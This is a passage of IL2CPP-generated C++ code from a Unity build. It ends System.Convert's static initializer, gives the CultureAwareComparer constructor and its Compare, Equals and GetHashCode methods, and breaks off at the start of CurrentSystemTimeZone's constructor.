RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_13 = L_10; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_14 = { reinterpret_cast<intptr_t> (Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_0_0_0_var) }; Type_t * L_15 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_14, /*hidden argument*/NULL); ArrayElementTypeCheck (L_13, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_15, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_13)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(4), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_15, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_16 = L_13; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_17 = { reinterpret_cast<intptr_t> (SByte_t9070AEA2966184235653CB9B4D33B149CDA831DF_0_0_0_var) }; Type_t * L_18 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_17, /*hidden argument*/NULL); ArrayElementTypeCheck (L_16, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_18, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_16)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(5), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_18, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_19 = L_16; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_20 = { reinterpret_cast<intptr_t> (Byte_tF87C579059BD4633E6840EBBBEEF899C6E33EF07_0_0_0_var) }; Type_t * L_21 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_20, /*hidden argument*/NULL); ArrayElementTypeCheck (L_19, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_21, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_19)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(6), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_21, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_22 = L_19; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_23 = { reinterpret_cast<intptr_t> (Int16_t823A20635DAF5A3D93A1E01CFBF3CBA27CF00B4D_0_0_0_var) }; Type_t * L_24 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_23, /*hidden argument*/NULL); ArrayElementTypeCheck (L_22, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_24, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_22)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(7), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_24, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_25 = L_22; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_26 = { reinterpret_cast<intptr_t> (UInt16_tAE45CEF73BF720100519F6867F32145D075F928E_0_0_0_var) }; Type_t * L_27 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_26, /*hidden argument*/NULL); ArrayElementTypeCheck (L_25, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_27, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_25)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(8), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_27, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_28 = L_25; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_29 = { reinterpret_cast<intptr_t> (Int32_t585191389E07734F19F3156FF88FB3EF4800D102_0_0_0_var) }; Type_t * L_30 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_29, /*hidden argument*/NULL); ArrayElementTypeCheck (L_28, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_30, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_28)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)9)), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_30, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_31 = L_28; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_32 = { reinterpret_cast<intptr_t> (UInt32_t4980FA09003AFAAB5A6E361BA2748EA9A005709B_0_0_0_var) }; Type_t * L_33 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_32, /*hidden argument*/NULL); ArrayElementTypeCheck (L_31, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_33, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_31)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)10)), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_33, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_34 = L_31; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_35 = { reinterpret_cast<intptr_t> (Int64_t7A386C2FF7B0280A0F516992401DDFCF0FF7B436_0_0_0_var) }; Type_t * L_36 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_35, /*hidden argument*/NULL); ArrayElementTypeCheck (L_34, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_36, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_34)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)11)), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_36, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_37 = L_34; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_38 = { reinterpret_cast<intptr_t> (UInt64_tA02DF3B59C8FC4A849BD207DA11038CC64E4CB4E_0_0_0_var) }; Type_t * L_39 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_38, /*hidden argument*/NULL); ArrayElementTypeCheck (L_37, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_39, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_37)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)12)), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_39, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_40 = L_37; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_41 = { reinterpret_cast<intptr_t> (Single_tDDDA9169C4E4E308AC6D7A824F9B28DC82204AE1_0_0_0_var) }; Type_t * L_42 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_41, /*hidden argument*/NULL); ArrayElementTypeCheck (L_40, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_42, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_40)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)13)), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_42, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_43 = L_40; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_44 = { reinterpret_cast<intptr_t> (Double_t358B8F23BDC52A5DD700E727E204F9F7CDE12409_0_0_0_var) }; Type_t * L_45 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_44, /*hidden argument*/NULL); ArrayElementTypeCheck (L_43, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_45, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_43)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)14)), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_45, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_46 = L_43; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_47 = { reinterpret_cast<intptr_t> (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_0_0_0_var) }; Type_t * L_48 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_47, /*hidden argument*/NULL); ArrayElementTypeCheck (L_46, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_48, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_46)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)15)), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_48, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_49 = L_46; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_50 = { reinterpret_cast<intptr_t> (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_0_0_0_var) }; Type_t * L_51 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_50, /*hidden argument*/NULL); ArrayElementTypeCheck (L_49, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_51, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_49)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)16)), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_51, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_52 = L_49; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_53 = { reinterpret_cast<intptr_t> (RuntimeObject_0_0_0_var) }; Type_t * L_54 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_53, /*hidden argument*/NULL); ArrayElementTypeCheck (L_52, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_54, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_52)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)17)), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_54, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_55 = L_52; RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_56 = { reinterpret_cast<intptr_t> (String_t_0_0_0_var) }; Type_t * L_57 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_56, /*hidden argument*/NULL); ArrayElementTypeCheck (L_55, ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_57, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); (L_55)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)18)), (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_57, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->set_ConvertTypes_0(L_55); RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_58 = { reinterpret_cast<intptr_t> (Enum_t2AF27C02B8653AE29442467390005ABC74D8F521_0_0_0_var) }; Type_t * L_59 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_58, /*hidden argument*/NULL); ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->set_EnumType_1(((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)CastclassClass((RuntimeObject*)L_59, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var))); CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* L_60 = (CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2*)SZArrayNew(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2_il2cpp_TypeInfo_var, (uint32_t)((int32_t)65)); CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* L_61 = L_60; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_62 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____A1319B706116AB2C6D44483F60A7D0ACEA543396_84_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_61, L_62, /*hidden argument*/NULL); ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->set_base64Table_2(L_61); IL2CPP_RUNTIME_CLASS_INIT(DBNull_t7400E04939C2C29699B389B106997892BF53A8E5_il2cpp_TypeInfo_var); DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * L_63 = ((DBNull_t7400E04939C2C29699B389B106997892BF53A8E5_StaticFields*)il2cpp_codegen_static_fields_for(DBNull_t7400E04939C2C29699B389B106997892BF53A8E5_il2cpp_TypeInfo_var))->get_Value_0(); ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->set_DBNull_3(L_63); return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.CultureAwareComparer::.ctor(System.Globalization.CultureInfo,System.Boolean) extern "C" IL2CPP_METHOD_ATTR void CultureAwareComparer__ctor_m932FEC0DC86BAD111BC13357F712B51262F4EB28 (CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * __this, CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * ___culture0, bool ___ignoreCase1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (CultureAwareComparer__ctor_m932FEC0DC86BAD111BC13357F712B51262F4EB28_MetadataUsageId); s_Il2CppMethodInitialized = true; } CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * G_B2_0 = NULL; CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * G_B1_0 = NULL; int32_t G_B3_0 = 0; CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * G_B3_1 = NULL; { IL2CPP_RUNTIME_CLASS_INIT(StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE_il2cpp_TypeInfo_var); StringComparer__ctor_mB32547253FAD35661634154EE51010A1BFA84142(__this, /*hidden argument*/NULL); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_0 = ___culture0; CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * L_1 = VirtFuncInvoker0< CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * >::Invoke(12 /* System.Globalization.CompareInfo System.Globalization.CultureInfo::get_CompareInfo() */, L_0); __this->set__compareInfo_4(L_1); bool L_2 = ___ignoreCase1; __this->set__ignoreCase_5(L_2); bool L_3 = ___ignoreCase1; G_B1_0 = __this; if (L_3) { G_B2_0 = __this; goto IL_0020; } } { G_B3_0 = 0; G_B3_1 = G_B1_0; goto IL_0021; } IL_0020: { G_B3_0 = 1; G_B3_1 = G_B2_0; } IL_0021: { G_B3_1->set__options_6(G_B3_0); return; } } // System.Int32 System.CultureAwareComparer::Compare(System.String,System.String) extern "C" IL2CPP_METHOD_ATTR int32_t CultureAwareComparer_Compare_mFAC57FE09A32284BFD0A6341DAEDE699CD8F7875 (CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * __this, String_t* ___x0, String_t* ___y1, const RuntimeMethod* method) { { String_t* L_0 = ___x0; String_t* L_1 = ___y1; if ((!(((RuntimeObject*)(String_t*)L_0) == ((RuntimeObject*)(String_t*)L_1)))) { goto IL_0006; } } { return 0; } IL_0006: { String_t* L_2 = ___x0; if (L_2) { goto IL_000b; } } { return (-1); } IL_000b: { String_t* L_3 = ___y1; if (L_3) { goto IL_0010; } } { return 1; } IL_0010: { CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * L_4 = __this->get__compareInfo_4(); String_t* L_5 = ___x0; String_t* L_6 = ___y1; int32_t L_7 = __this->get__options_6(); int32_t L_8 = VirtFuncInvoker3< int32_t, String_t*, String_t*, int32_t >::Invoke(7 /* System.Int32 System.Globalization.CompareInfo::Compare(System.String,System.String,System.Globalization.CompareOptions) */, L_4, L_5, L_6, L_7); return L_8; } } // System.Boolean System.CultureAwareComparer::Equals(System.String,System.String) extern "C" IL2CPP_METHOD_ATTR bool CultureAwareComparer_Equals_mB8AECEA6632EF58EAC9885DF10E85746F37D250F (CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * __this, String_t* ___x0, String_t* ___y1, const RuntimeMethod* method) { { String_t* L_0 = ___x0; String_t* L_1 = ___y1; if ((!(((RuntimeObject*)(String_t*)L_0) == ((RuntimeObject*)(String_t*)L_1)))) { goto IL_0006; } } { return (bool)1; } IL_0006: { String_t* L_2 = ___x0; if (!L_2) { goto IL_000c; } } { String_t* L_3 = ___y1; if (L_3) { goto IL_000e; } } IL_000c: { return (bool)0; } IL_000e: { CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * L_4 = __this->get__compareInfo_4(); String_t* L_5 = ___x0; String_t* L_6 = ___y1; int32_t L_7 = __this->get__options_6(); int32_t L_8 = VirtFuncInvoker3< int32_t, String_t*, String_t*, int32_t >::Invoke(7 /* System.Int32 System.Globalization.CompareInfo::Compare(System.String,System.String,System.Globalization.CompareOptions) */, L_4, L_5, L_6, L_7); return (bool)((((int32_t)L_8) == ((int32_t)0))? 1 : 0); } } // System.Int32 System.CultureAwareComparer::GetHashCode(System.String) extern "C" IL2CPP_METHOD_ATTR int32_t CultureAwareComparer_GetHashCode_m6ADEE70C24EB4AAB42C72C9808DF036EDE055D9A (CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * __this, String_t* ___obj0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (CultureAwareComparer_GetHashCode_m6ADEE70C24EB4AAB42C72C9808DF036EDE055D9A_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___obj0; if (L_0) { goto IL_000e; } } { ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * L_1 = (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD *)il2cpp_codegen_object_new(ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var); ArgumentNullException__ctor_mEE0C0D6FCB2D08CD7967DBB1329A0854BBED49ED(L_1, _stringLiteral9B5C0B859FABA061DD60FD8070FCE74FCEE29D0B, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, CultureAwareComparer_GetHashCode_m6ADEE70C24EB4AAB42C72C9808DF036EDE055D9A_RuntimeMethod_var); } IL_000e: { CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * L_2 = __this->get__compareInfo_4(); String_t* L_3 = ___obj0; int32_t L_4 = __this->get__options_6(); int32_t L_5 = CompareInfo_GetHashCodeOfString_m91DE0691957416A2BBC9AADD8D4AE2A2885A5AB3(L_2, L_3, L_4, /*hidden argument*/NULL); return L_5; } } // System.Boolean System.CultureAwareComparer::Equals(System.Object) extern "C" IL2CPP_METHOD_ATTR bool CultureAwareComparer_Equals_mEA38131EAA97A1058C5A284AE1F9A03DC8412CD2 (CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * __this, RuntimeObject * ___obj0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (CultureAwareComparer_Equals_mEA38131EAA97A1058C5A284AE1F9A03DC8412CD2_MetadataUsageId); s_Il2CppMethodInitialized = true; } CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * V_0 = NULL; { RuntimeObject * L_0 = ___obj0; V_0 = ((CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 *)IsInstSealed((RuntimeObject*)L_0, CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058_il2cpp_TypeInfo_var)); CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * L_1 = V_0; if (L_1) { goto IL_000c; } } { return (bool)0; } IL_000c: { bool L_2 = __this->get__ignoreCase_5(); CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * L_3 = V_0; bool L_4 = L_3->get__ignoreCase_5(); if ((!(((uint32_t)L_2) == ((uint32_t)L_4)))) { goto IL_003e; } } { CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * L_5 = __this->get__compareInfo_4(); CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * L_6 = V_0; CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * L_7 = L_6->get__compareInfo_4(); bool L_8 = VirtFuncInvoker1< bool, RuntimeObject * >::Invoke(0 /* System.Boolean System.Object::Equals(System.Object) */, L_5, L_7); if (!L_8) { goto IL_003c; } } { int32_t L_9 = __this->get__options_6(); CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * L_10 = V_0; int32_t L_11 = L_10->get__options_6(); return (bool)((((int32_t)L_9) == ((int32_t)L_11))? 1 : 0); } IL_003c: { return (bool)0; } IL_003e: { return (bool)0; } } // System.Int32 System.CultureAwareComparer::GetHashCode() extern "C" IL2CPP_METHOD_ATTR int32_t CultureAwareComparer_GetHashCode_m79D2648739C821E743AEE4E15471D9C58F86BAF8 (CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 * __this, const RuntimeMethod* method) { int32_t V_0 = 0; { CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * L_0 = __this->get__compareInfo_4(); int32_t L_1 = VirtFuncInvoker0< int32_t >::Invoke(2 /* System.Int32 System.Object::GetHashCode() */, L_0); V_0 = L_1; bool L_2 = __this->get__ignoreCase_5(); if (L_2) { goto IL_0016; } } { int32_t L_3 = V_0; return L_3; } IL_0016: { int32_t L_4 = V_0; return ((~L_4)); } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.CurrentSystemTimeZone::.ctor() extern "C" IL2CPP_METHOD_ATTR void CurrentSystemTimeZone__ctor_m19D1DDA56D25F55B9EF411773A18CC0914DA61C4 (CurrentSystemTimeZone_t7689B8BF1C4A474BD3CFA5B8E89FA84A53D44171 * __this, const RuntimeMethod* method) { static bool 